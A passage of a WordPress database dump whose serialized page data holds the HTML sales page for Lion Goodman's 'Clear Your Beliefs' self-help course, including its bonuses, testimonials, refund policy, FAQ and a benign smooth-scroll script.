width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:17:"CYB banner header";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1880, 2166, 'panels_data', 'a:3:{s:7:"widgets";a:5:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:179:"<div class="embed-container"><iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="300" height="150" frameborder="0" allowfullscreen="allowfullscreen"></iframe></div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:661:"<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:70516:"\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good 